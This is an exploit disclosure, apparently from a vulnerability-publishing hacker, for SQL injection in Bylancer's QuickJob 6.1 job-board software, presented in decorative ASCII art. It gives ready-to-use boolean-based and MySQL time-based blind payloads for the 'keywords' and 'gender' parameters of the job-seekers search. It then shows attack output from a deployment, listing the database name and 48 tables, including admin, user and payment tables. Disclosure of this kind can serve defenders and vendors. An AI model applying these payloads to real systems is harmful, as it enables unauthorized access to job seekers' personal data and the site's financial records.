┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://quickjob.bylancer.com │ │ Vendor : Bylancer │ │ Software : QuickJob 6.1 │ │ Vuln Type: SQL Injection │ │ Impact : Database Access │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ │ │ SQL injection attacks can allow unauthorized access to sensitive data, modification of │ │ data and crash the application or make it unavailable, leading to lost revenue and │ │ damage to a company's reputation. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /listing https://website/job-seekers?keywords=[SQLI]&location=&placetype=&placeid=&cat=&subcat=&age_range1=&age_range2=&range1=&range2=&gender=[SQLI] GET parameter 'keywords' is vulnerable to SQL Injection --- Parameter: keywords (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: keywords=' AND 08186=8186 OR '04586'='4586&location=&placetype=&placeid=&cat=&subcat=&age_range1=&age_range2=&range1=&range2=&gender= Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (IF - comment) Payload: keywords='XOR(IF(now()=sysdate(),SLEEP(9),0))XOR'Z&location=&placetype=&placeid=&cat=&subcat=&age_range1=&age_range2=&range1=&range2=&gender= --- GET parameter 'gender' is vulnerable to SQL Injection --- Parameter: gender (GET) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: keywords=&location=&placetype=&placeid=&cat=&subcat=&age_range1=&age_range2=&range1=&range2=&gender='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z --- [+] Starting the Attack fetching current database current database: 'quickjob_**' fetching tables [48 tables] +---------------------------+ | job_logs | | job_blog | | job_currencies | | job_user | | job_emailq | | job_custom_fields | | job_notification | | job_reviews | | job_testimonials | | job_user_applied | | job_countries | | job_product_resubmit | | job_category_translation | | job_favads | | job_experiences | | job_blog_categories | | job_faq_entries | | job_subadmin1 | | job_cities | | job_push_notification | | job_product | | job_upgrades | | job_catagory_sub | | job_messages | | job_catagory_main | | job_firebase_device_token | | job_time_zones | | job_blog_comment | | job_custom_options | | job_payments | | job_adsense | | job_blog_cat_relation | | job_languages | | job_custom_data | | job_pages | | job_companies | | job_balance | | job_login_attempts | | job_subscriptions | | job_fav_users | | job_admins | | job_resumes | | job_product_type | | job_salary_type | | job_transaction | | job_options | | job_usergroups | | job_subadmin2 | +---------------------------+ [-] Done